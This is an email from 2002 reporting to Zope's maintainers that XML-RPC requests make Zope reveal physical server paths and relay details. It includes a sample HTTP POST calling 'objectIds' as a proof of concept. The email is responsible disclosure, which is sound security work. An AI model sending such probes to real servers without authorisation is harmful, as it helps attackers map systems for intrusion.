----- Original Message ----- From: "Rossen Raykov" <raikovr@yahoo.com> To: <webmaster@zope.org>; <webmaster@zope.com> Cc: <sacure@zope.org>; <secure@zope.com> Sent: Thursday, April 18, 2002 10:41 PM Subject: Zope insecure handling on XML-RPC will reveal information about the server's physical paths.
A request like the quoted below will cause Zope to reveal information about physical paths on the server and about the local servers on which it is relaying (the last one may be miss configuration, sorry I'm not so familiar with the platform).
As fare, as I know this problem is present on all currently released Zope versions including 2.5.0.
Running the server without -D option wouldn't help.
The last version from CVS seems to handle this correct.
Thanks to Chris Withers and Shane Hathaway I was able to test in on the build from 15/04/02 and it worked just fine.
I'm interested to know if there is any other way to fix that bug.
BW when the next release will be available?
Regards,
Rossen
-------- CUT HERE ---------
POST /Foo/Bar/MyFolder HTTP/1.0 Content-Type: text/xml Content-length: 95
<?xml version="1.0"?> <methodCall> <methodName>objectIds</methodName> <params/> </methodCall>
_________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com